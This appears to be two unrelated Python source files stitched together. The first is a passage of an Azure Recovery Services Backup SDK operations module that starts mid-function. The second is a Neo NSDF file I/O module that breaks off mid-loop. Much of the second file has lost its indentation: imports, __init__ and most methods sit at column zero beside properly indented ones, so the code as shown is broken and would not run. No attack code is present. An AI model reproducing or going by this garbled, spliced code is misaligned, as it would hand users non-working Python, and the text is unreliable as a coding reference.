    resource_group_name: str,
    subscription_id: str,
    fabric_name: str,
    container_name: str,
    *,
    json: JSONType = None,
    content: Any = None,
    **kwargs: Any
) -> HttpRequest:
    """Build an HTTP PUT request that registers a protection container."""
    content_type = kwargs.pop('content_type', None)  # type: Optional[str]
    api_version = "2021-12-01"
    accept = "application/json"

    # Resolve the URL template and substitute the path parameters.
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}')
    url = _format_url_section(
        url,
        vaultName=_SERIALIZER.url("vault_name", vault_name, 'str'),
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
        fabricName=_SERIALIZER.url("fabric_name", fabric_name, 'str'),
        containerName=_SERIALIZER.url("container_name", container_name, 'str'),
    )

    # Query string.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers; Content-Type is sent only when a body serialization type
    # was provided by the caller.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    if content_type is not None:
        headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="PUT",
        url=url,
        params=params,
        headers=headers,
        json=json,
        content=content,
        **kwargs
    )
def build_unregister_request(
    vault_name: str,
    resource_group_name: str,
    subscription_id: str,
    fabric_name: str,
    container_name: str,
    **kwargs: Any
) -> HttpRequest:
    """Build an HTTP DELETE request that unregisters a protection container."""
    api_version = "2021-12-01"
    accept = "application/json"

    # Resolve the URL template and substitute the path parameters.
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}')
    url = _format_url_section(
        url,
        vaultName=_SERIALIZER.url("vault_name", vault_name, 'str'),
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
        fabricName=_SERIALIZER.url("fabric_name", fabric_name, 'str'),
        containerName=_SERIALIZER.url("container_name", container_name, 'str'),
    )

    # Query string.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="DELETE",
        url=url,
        params=params,
        headers=headers,
        **kwargs
    )
def build_inquire_request(
    vault_name: str,
    resource_group_name: str,
    subscription_id: str,
    fabric_name: str,
    container_name: str,
    *,
    filter: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    """Build an HTTP POST request that triggers inquiry on a container."""
    api_version = "2021-12-01"
    accept = "application/json"

    # Resolve the URL template and substitute the path parameters.
    url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}/inquire')
    url = _format_url_section(
        url,
        vaultName=_SERIALIZER.url("vault_name", vault_name, 'str'),
        resourceGroupName=_SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        subscriptionId=_SERIALIZER.url("subscription_id", subscription_id, 'str'),
        fabricName=_SERIALIZER.url("fabric_name", fabric_name, 'str'),
        containerName=_SERIALIZER.url("container_name", container_name, 'str'),
    )

    # Query string; $filter is optional.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    if filter is not None:
        params['$filter'] = _SERIALIZER.query("filter", filter, 'str')

    # Headers.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="POST",
        url=url,
        params=params,
        headers=headers,
        **kwargs
    )
def build_refresh_request(
    vault_name: str,
    resource_group_name: str,
    subscription_id: str,
    fabric_name: str,
    *,
    filter: Optional[str] = None,
    **kwargs: Any
) -> HttpRequest:
    """Build the HTTP POST request that refreshes (re-discovers) containers on a fabric.

    :param vault_name: The name of the recovery services vault.
    :param resource_group_name: Resource group containing the vault.
    :param subscription_id: The subscription id for the request path.
    :param fabric_name: Fabric name associated with the container.
    :keyword filter: OData filter options; omitted from the query string when None.
    :return: An :class:`~azure.core.rest.HttpRequest` ready to run through the pipeline.
    """
    api_version = "2021-12-01"
    accept = "application/json"

    # Resolve the URL template (overridable via 'template_url') and fill in
    # the serialized path parameters.
    url = kwargs.pop(
        "template_url",
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/refreshContainers'
    )
    url = _format_url_section(url, **{
        "vaultName": _SERIALIZER.url("vault_name", vault_name, 'str'),
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
        "fabricName": _SERIALIZER.url("fabric_name", fabric_name, 'str'),
    })

    # Query string: api-version is mandatory, $filter is optional.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    if filter is not None:
        params['$filter'] = _SERIALIZER.query("filter", filter, 'str')

    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="POST",
        url=url,
        params=params,
        headers=headers,
        **kwargs
    )
class ProtectionContainersOperations(object):
    """ProtectionContainersOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.recoveryservicesbackup.activestamp.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace
    def get(
        self,
        vault_name: str,
        resource_group_name: str,
        fabric_name: str,
        container_name: str,
        **kwargs: Any
    ) -> "_models.ProtectionContainerResource":
        """Gets details of the specific container registered to your Recovery Services Vault.

        :param vault_name: The name of the recovery services vault.
        :type vault_name: str
        :param resource_group_name: The name of the resource group where the recovery services vault is
         present.
        :type resource_group_name: str
        :param fabric_name: Name of the fabric where the container belongs.
        :type fabric_name: str
        :param container_name: Name of the container whose details need to be fetched.
        :type container_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ProtectionContainerResource, or the result of cls(response)
        :rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProtectionContainerResource"]
        # Map well-known ARM error codes to typed exceptions; a caller-supplied
        # 'error_map' can extend or override these defaults.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        request = build_get_request(
            vault_name=vault_name,
            resource_group_name=resource_group_name,
            subscription_id=self._config.subscription_id,
            fabric_name=fabric_name,
            container_name=container_name,
            template_url=self.get.metadata['url'],
        )
        # Adapt the protocol request for the pipeline and expand the host part
        # of the URL from the client configuration.
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ProtectionContainerResource', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}'}  # type: ignore

    @distributed_trace
    def register(
        self,
        vault_name: str,
        resource_group_name: str,
        fabric_name: str,
        container_name: str,
        parameters: "_models.ProtectionContainerResource",
        **kwargs: Any
    ) -> Optional["_models.ProtectionContainerResource"]:
        """Registers the container with Recovery Services vault.
        This is an asynchronous operation. To track the operation status, use location header to call
        get latest status of
        the operation.

        :param vault_name: The name of the recovery services vault.
        :type vault_name: str
        :param resource_group_name: The name of the resource group where the recovery services vault is
         present.
        :type resource_group_name: str
        :param fabric_name: Fabric name associated with the container.
        :type fabric_name: str
        :param container_name: Name of the container to be registered.
        :type container_name: str
        :param parameters: Request body for operation.
        :type parameters:
         ~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ProtectionContainerResource, or the result of cls(response)
        :rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource or
         None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[Optional["_models.ProtectionContainerResource"]]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        _json = self._serialize.body(parameters, 'ProtectionContainerResource')

        request = build_register_request(
            vault_name=vault_name,
            resource_group_name=resource_group_name,
            subscription_id=self._config.subscription_id,
            fabric_name=fabric_name,
            container_name=container_name,
            content_type=content_type,
            json=_json,
            template_url=self.register.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        # 200 carries the registered container in the body; 202 means the
        # registration is still in progress, so there is nothing to deserialize.
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('ProtectionContainerResource', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    register.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}'}  # type: ignore

    @distributed_trace
    def unregister(
        self,
        vault_name: str,
        resource_group_name: str,
        fabric_name: str,
        container_name: str,
        **kwargs: Any
    ) -> None:
        """Unregisters the given container from your Recovery Services Vault. This is an asynchronous
        operation. To determine
        whether the backend service has finished processing the request, call Get Container Operation
        Result API.

        :param vault_name: The name of the recovery services vault.
        :type vault_name: str
        :param resource_group_name: The name of the resource group where the recovery services vault is
         present.
        :type resource_group_name: str
        :param fabric_name: Name of the fabric where the container belongs.
        :type fabric_name: str
        :param container_name: Name of the container which needs to be unregistered from the Recovery
         Services Vault.
        :type container_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        request = build_unregister_request(
            vault_name=vault_name,
            resource_group_name=resource_group_name,
            subscription_id=self._config.subscription_id,
            fabric_name=fabric_name,
            container_name=container_name,
            template_url=self.unregister.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # 200/204 = done, 202 = accepted and still processing (async operation).
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    unregister.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}'}  # type: ignore

    @distributed_trace
    def inquire(
        self,
        vault_name: str,
        resource_group_name: str,
        fabric_name: str,
        container_name: str,
        filter: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """Inquires all the protectable items under the given container.
        This is an async operation and the results should be tracked using location header or
        Azure-async-url.

        :param vault_name: The name of the recovery services vault.
        :type vault_name: str
        :param resource_group_name: The name of the resource group where the recovery services vault is
         present.
        :type resource_group_name: str
        :param fabric_name: Fabric Name associated with the container.
        :type fabric_name: str
        :param container_name: Name of the container in which inquiry needs to be triggered.
        :type container_name: str
        :param filter: OData filter options.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        request = build_inquire_request(
            vault_name=vault_name,
            resource_group_name=resource_group_name,
            subscription_id=self._config.subscription_id,
            fabric_name=fabric_name,
            container_name=container_name,
            filter=filter,
            template_url=self.inquire.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Only 202 (accepted) is expected; results are tracked asynchronously.
        if response.status_code not in [202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    inquire.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/protectionContainers/{containerName}/inquire'}  # type: ignore

    @distributed_trace
    def refresh(
        self,
        vault_name: str,
        resource_group_name: str,
        fabric_name: str,
        filter: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """Discovers all the containers in the subscription that can be backed up to Recovery Services
        Vault. This is an
        asynchronous operation. To know the status of the operation, call GetRefreshOperationResult
        API.

        :param vault_name: The name of the recovery services vault.
        :type vault_name: str
        :param resource_group_name: The name of the resource group where the recovery services vault is
         present.
        :type resource_group_name: str
        :param fabric_name: Fabric name associated the container.
        :type fabric_name: str
        :param filter: OData filter options.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        request = build_refresh_request(
            vault_name=vault_name,
            resource_group_name=resource_group_name,
            subscription_id=self._config.subscription_id,
            fabric_name=fabric_name,
            filter=filter,
            template_url=self.refresh.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Only 202 (accepted) is expected; results are tracked asynchronously.
        if response.status_code not in [202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    refresh.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupFabrics/{fabricName}/refreshContainers'}  # type: ignore
| |
# -*- coding: utf-8 -*-
"""
Module for reading and writing NSDF files
Author: Mieszko Grodzicki
This module supports both reading and writing NSDF files.
Note: Read file must be written using this IO
"""
from __future__ import absolute_import
import numpy as np
import quantities as pq
from uuid import uuid1
import pickle
from datetime import datetime
import os
try:
import nsdf
import h5py
except ImportError as err:
HAVE_NSDF = False
NSDF_ERR = err
else:
HAVE_NSDF = True
NSDF_ERR = None
from neo.io.baseio import BaseIO
from neo.core import Block, Segment, AnalogSignal, IrregularlySampledSignal, \
Event, Epoch, ChannelIndex
class NSDFIO(BaseIO):
    """
    Class for reading and writing files in NSDF Format.

    It supports reading and writing: Block, Segment, AnalogSignal, IrregularlySampledSignal,
    Event, ChannelIndex, with all relationships and metadata.
    """
    is_readable = True
    is_writable = True

    # All object types this IO understands when nested inside a container.
    supported_objects = [Block, Segment, ChannelIndex, AnalogSignal,
                         IrregularlySampledSignal, Event]
    # Only containers can be used as top-level read/write entry points.
    readable_objects = [Block, Segment]
    writeable_objects = [Block, Segment]

    has_header = False
    is_streameable = False
    name = 'NSDF'
    extensions = ['h5']
    # This IO operates on a single HDF5 file rather than a directory.
    mode = 'file'
def __init__(self, filename=None):
"""
Initialise NSDFIO instance
:param filename: Path to the file
"""
if not HAVE_NSDF:
raise Exception("Failed to import NSDF.")
if filename is None:
raise ValueError("Must provide an input file.")
BaseIO.__init__(self)
self.filename = filename
self.dt_format = '%d/%m/%Y %H:%M:%S'
self.modeltree_path = '/model/modeltree/neo/'
def write_all_blocks(self, blocks):
"""
Write list of blocks to the file
:param blocks: List of blocks to be written
"""
writer = self._init_writing()
neo_model, blocks_model, segments_model = self._prepare_model_tree(writer)
name_pattern = self._name_pattern(len(blocks))
for i, block in enumerate(blocks):
self.write_block(block, name_pattern.format(i), blocks_model, writer)
def write_block(self, block=None, name='0', parent=None, writer=None):
"""
Write a Block to the file
:param block: Block to be written
:param name: Name for block representation in NSDF model tree (optional)
:param writer: NSDFWriter instance (optional)
:param parent: NSDF ModelComponent which will be the parent of block NSDF representation (optional)
"""
if not isinstance(block, Block):
raise ValueError("Must provide a Block to write.")
if writer is None:
writer = self._init_writing()
if parent is None:
neo_model, parent, segments_model = self._prepare_model_tree(writer)
block_model = nsdf.ModelComponent(name, uid=uuid1().hex, parent=parent)
self._write_container_metadata(block, block_model)
self._write_model_component(block_model, writer)
self._write_block_children(block, block_model, writer)
self._clean_nsdfio_annotations(block)
    def _write_block_children(self, block, block_model, writer):
        # A block's direct children are its segments and channel indexes; each
        # collection gets its own grouping node under the block model.
        self._write_children(block.segments, 'segments', 'write_segment', block_model, writer)
        self._write_children(block.channel_indexes, 'channel_indexes', 'write_channelindex',
                             block_model, writer)
def write_segment(self, segment=None, name='0', writer=None, parent=None):
"""
Write a Segment to the file
:param segment: Segment to be written
:param name: Name for segment representation in NSDF model tree (optional)
:param writer: NSDFWriter instance (optional)
:param parent: NSDF ModelComponent which will be the parent of segment NSDF representation (optional)
"""
if not isinstance(segment, Segment):
raise ValueError("Must provide a Segment to write.")
if writer is None:
writer = self._init_writing()
single_segment = False
if parent is None:
neo_model, blocks_model, parent = self._prepare_model_tree(writer)
single_segment = True
model = nsdf.ModelComponent(name, uid=uuid1().hex, parent=parent)
self._write_container_metadata(segment, model)
self._write_model_component(model, writer)
self._write_segment_children(model, segment, writer)
if single_segment:
self._clean_nsdfio_annotations(segment)
def _write_segment_children(self, model, segment, writer):
self._write_children(segment.analogsignals, 'analogsignals', 'write_analogsignal', model, writer)
self._write_children(segment.irregularlysampledsignals, 'irregularlysampledsignals',
'write_irregularlysampledsignal', model, writer)
self._write_children(segment.events, 'events', 'write_event', model, writer)
self._write_children(segment.epochs, 'epochs', 'write_epoch', model, writer)
def write_analogsignal(self, signal, name, writer, parent):
"""
Write an AnalogSignal to the file
:param signal: AnalogSignal to be written
:param name: Name for signal representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of signal NSDF representation
"""
self._write_signal(signal, name, writer, parent)
def write_irregularlysampledsignal(self, signal, name, writer, parent):
"""
Write an IrregularlySampledSignal to the file
:param signal: IrregularlySampledSignal to be written
:param name: Name for signal representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of signal NSDF representation
"""
self._write_signal(signal, name, writer, parent)
def _write_signal(self, signal, name, writer, parent):
uid = uuid1().hex
model = nsdf.ModelComponent(name, uid=uid, parent=parent)
regular = isinstance(signal, AnalogSignal)
if self._write_only_reference(model, signal, uid, writer):
return
self._write_basic_metadata(model, signal)
r_signal = np.swapaxes(signal, 0, 1)
channels_model, channels, source_ds = self._create_signal_data_sources(model, len(r_signal),
uid, writer, regular)
self._write_signal_data(model, channels, r_signal, signal, source_ds, writer)
self._write_model_tree(model, writer)
signal.annotations['nsdfio_uid'] = uid
def write_event(self, event, name, writer, parent):
"""
Write an Event to the file
:param event: Event to be written
:param name: Name for event representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of event NSDF representation
"""
self._write_event_object(event, name, writer, parent)
def write_epoch(self, epoch, name, writer, parent):
"""
Write an Epoch to the file
:param epoch: Epoch to be written
:param name: Name for epoch representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of epoch NSDF representation
"""
self._write_event_object(epoch, name, writer, parent)
def _write_event_object(self, object, name, writer, parent):
uid = uuid1().hex
model = nsdf.ModelComponent(name, uid=uid, parent=parent)
if self._write_only_reference(model, object, uid, writer):
return
self._write_basic_metadata(model, object)
self._write_model_component(model, writer)
source_ds, source_name_dict = self._create_event_data_sources(model, uid, writer)
self._write_event_data(object, model, source_ds, source_name_dict, writer)
if isinstance(object, Epoch):
source_ds, source_name_dict = self._create_epoch_data_sources(model, uid, writer)
self._write_epoch_data(object, model, source_ds, source_name_dict, writer)
object.annotations['nsdfio_uid'] = uid
def write_channelindex(self, channelindex, name, writer, parent):
"""
Write a ChannelIndex to the file
:param channelindex: ChannelIndex to be written
:param name: Name for channelindex representation in NSDF model tree
:param writer: NSDFWriter instance
:param parent: NSDF ModelComponent which will be the parent of channelindex NSDF representation
"""
uid = uuid1().hex
model = nsdf.ModelComponent(name, uid=uid, parent=parent)
self._write_basic_metadata(model, channelindex)
self._write_model_component(model, writer)
self._write_channelindex_arrays(model, channelindex, writer)
self._write_channelindex_children(channelindex, model, writer)
    def _write_channelindex_children(self, channelindex, model, writer):
        # Signals already written under a segment are stored as references here
        # (see _write_only_reference), preserving the many-to-many link.
        self._write_children(channelindex.analogsignals, 'analogsignals', 'write_analogsignal', model, writer)
def _write_children(self, children, name, function, parent_model, writer):
model = nsdf.ModelComponent(name=name, uid=uuid1().hex, parent=parent_model)
self._write_model_component(model, writer)
name_pattern = self._name_pattern(len(children))
for i, child in enumerate(children):
getattr(self, function)(child, name_pattern.format(i), writer, model)
def _init_writing(self):
return nsdf.NSDFWriter(self.filename, mode='w', dialect=nsdf.dialect.NUREGULAR)
def _prepare_model_tree(self, writer):
neo_model = nsdf.ModelComponent('neo', uid=uuid1().hex)
self._write_model_component(neo_model, writer)
blocks_model = nsdf.ModelComponent('blocks', uid=uuid1().hex, parent=neo_model)
self._write_model_component(blocks_model, writer)
segments_model = nsdf.ModelComponent('segments', uid=uuid1().hex, parent=neo_model)
self._write_model_component(segments_model, writer)
return neo_model, blocks_model, segments_model
def _number_of_digits(self, n):
return len(str(n))
def _name_pattern(self, how_many_items):
return '{{:0{}d}}'.format(self._number_of_digits(max(how_many_items - 1, 0)))
def _clean_nsdfio_annotations(self, object):
nsdfio_annotations = ('nsdfio_uid',)
for key in nsdfio_annotations:
object.annotations.pop(key, None)
if hasattr(object, 'children'):
for child in object.children:
self._clean_nsdfio_annotations(child)
def _write_only_reference(self, model, object, uid, writer):
if object.annotations.get('nsdfio_uid') is not None:
model.attrs['reference_to'] = object.annotations['nsdfio_uid']
self._write_model_component(model, writer)
return True
return False
def _write_model_component(self, model, writer):
if model.parent is None:
nsdf.add_model_component(model, writer.model['modeltree/'])
else:
nsdf.add_model_component(model, model.parent.hdfgroup)
def _write_model_tree(self, model, writer):
self._write_model_component(model, writer)
for child in model.children.values():
self._write_model_tree(child, writer)
def _write_container_metadata(self, container, container_model):
self._write_basic_metadata(container_model, container)
self._write_datetime_attributes(container_model, container)
self._write_index_attribute(container_model, container)
def _write_basic_metadata(self, model, object):
self._write_basic_attributes(model, object)
self._write_annotations(model, object)
def _write_basic_attributes(self, model, object):
if object.name is not None:
model.attrs['name'] = self._encode_string(object.name)
if object.description is not None:
model.attrs['description'] = self._encode_string(object.description)
def _write_datetime_attributes(self, model, object):
if object.rec_datetime is not None:
model.attrs['rec_datetime'] = object.rec_datetime.strftime(self.dt_format)
def _write_index_attribute(self, model, object):
if object.index is not None:
model.attrs['index'] = object.index
def _write_annotations(self, model, object):
if object.annotations is not None:
object.annotations.pop('nsdfio_path', None)
model.attrs['annotations'] = self._encode_string(pickle.dumps(object.annotations, 0))
def _write_signal_data(self, model, channels, r_signal, signal, source_ds, writer):
regular = isinstance(signal, AnalogSignal)
if regular:
self._write_analogsignal_data(model, channels, r_signal, signal, source_ds, writer)
else:
self._write_irregularlysampledsignal_data(model, channels, r_signal, signal, source_ds, writer)
def _write_analogsignal_data(self, model, channels, r_signal, signal, source_ds, writer):
dataobj = nsdf.UniformData('signal', unit=str(signal.units.dimensionality))
dataobj.set_dt(float(signal.sampling_period.magnitude),
str(signal.sampling_period.dimensionality))
dataobj.dtype = signal.dtype
for i in range(len(channels)):
dataobj.put_data(channels[i].uid, r_signal[i])
rescaled_tstart = signal.t_start.rescale(signal.sampling_period.dimensionality)
writer.add_uniform_data(source_ds, dataobj,
tstart=float(rescaled_tstart.magnitude))
model.attrs['t_start_unit'] = str(signal.t_start.dimensionality)
def _write_irregularlysampledsignal_data(self, model, channels, r_signal, signal, source_ds, writer):
dataobj = nsdf.NonuniformRegularData('signal', unit=str(signal.units.dimensionality))
dataobj.set_times(signal.times, str(signal.times.units.dimensionality))
dataobj.dtype = signal.dtype
for i in range(len(channels)):
dataobj.put_data(channels[i].uid, r_signal[i])
writer.add_nonuniform_regular(source_ds, dataobj)
def _create_signal_data_sources(self, model, channels_number, uid, writer, regular):
channels = []
channels_model = nsdf.ModelComponent(name='channels', uid=uuid1().hex, parent=model)
name_pattern = '{{:0{}d}}'.format(self._number_of_digits(max(channels_number - 1, 0)))
for i in range(channels_number):
channels.append(nsdf.ModelComponent(name_pattern.format(i),
uid=uuid1().hex,
parent=channels_model))
if regular:
source_ds = writer.add_uniform_ds(uid, [channel.uid.encode() for channel in channels])
else:
source_ds = writer.add_nonuniform_ds(uid, [channel.uid.encode() for channel in channels])
return channels_model, channels, source_ds
def _write_event_data(self, event, model, source_ds, source_name_dict, writer):
dataobj = nsdf.EventData('times', unit=str(event.units.dimensionality))
dataobj.put_data(model.uid, event.times)
writer.add_event_1d(source_ds, dataobj, source_name_dict)
self._write_array(model.hdfgroup, 'labels', event.labels)
def _create_event_data_sources(self, model, uid, writer):
source_ds = writer.add_event_ds_1d(uid, 'times', [uid])
source_name_dict = {}
source_name_dict[uid] = 'data'
return source_ds, source_name_dict
def _write_epoch_data(self, epoch, model, source_ds, source_name_dict, writer):
dataobj = nsdf.EventData('durations', unit=str(epoch.durations.units.dimensionality))
dataobj.put_data(model.uid, epoch.durations)
writer.add_event_1d(source_ds, dataobj, source_name_dict)
def _create_epoch_data_sources(self, model, uid, writer):
source_ds = writer.add_event_ds_1d(uid, 'durations', [uid])
source_name_dict = {}
source_name_dict[uid] = 'data'
return source_ds, source_name_dict
def _write_channelindex_arrays(self, model, channelindex, writer):
group = model.hdfgroup
self._write_array(group, 'index', channelindex.index)
if channelindex.channel_names is not None:
self._write_array(group, 'channel_names', channelindex.channel_names)
if channelindex.channel_ids is not None:
self._write_array(group, 'channel_ids', channelindex.channel_ids)
if channelindex.coordinates is not None:
self._write_array(group, 'coordinates', channelindex.coordinates)
    def _write_array(self, group, name, array):
        # Store an array-like value as an HDF5 dataset, preserving enough
        # metadata to reconstruct its Python type on read.
        if isinstance(array, pq.Quantity):
            # Quantities: store the bare magnitude, keep the unit as an attribute.
            group.create_dataset(name, data=array.magnitude)
            group[name].attrs['dimensionality'] = str(array.dimensionality)
        elif isinstance(array, np.ndarray):
            # h5py cannot store unicode arrays directly: encode to bytes and
            # wrap in np.void so the data survives as an opaque blob.
            if array.dtype.type == np.str_:
                array = np.void(np.char.encode(array))
            elif array.dtype.type == np.bytes_:
                array = np.void(array)
            group.create_dataset(name, data=array)
        else:
            # Plain sequences are flagged so the reader can restore a list.
            group.create_dataset(name, data=array)
            group[name].attrs['is_list'] = 'True'
def _encode_string(self, string):
if isinstance(string, str):
string = string.encode()
return np.void(string)
def read_all_blocks(self, lazy=False, cascade=True):
"""
Read all blocks from the file
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:return: List of read blocks
"""
reader = self._init_reading()
blocks = []
blocks_path = self.modeltree_path + 'blocks/'
for block in reader.model[blocks_path].values():
blocks.append(self.read_block(lazy, cascade, group=block, reader=reader))
return blocks
def read_block(self, lazy=False, cascade=True, group=None, reader=None):
"""
Read a Block from the file
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:param group: HDF5 Group representing the block in NSDF model tree (optional)
:param reader: NSDFReader instance (optional)
:return: Read block
"""
block = Block()
group, reader, single_block = self._select_first_container(group, reader, 'block')
if group is None:
return None
attrs = group.attrs
if cascade:
self._read_block_children(lazy, block, group, reader)
block.create_many_to_one_relationship()
self._read_container_metadata(attrs, block, path=group.name)
return block
    def _read_block_children(self, lazy, block, group, reader):
        # Segments and channel indexes are the only direct children of a block.
        for child in group['segments/'].values():
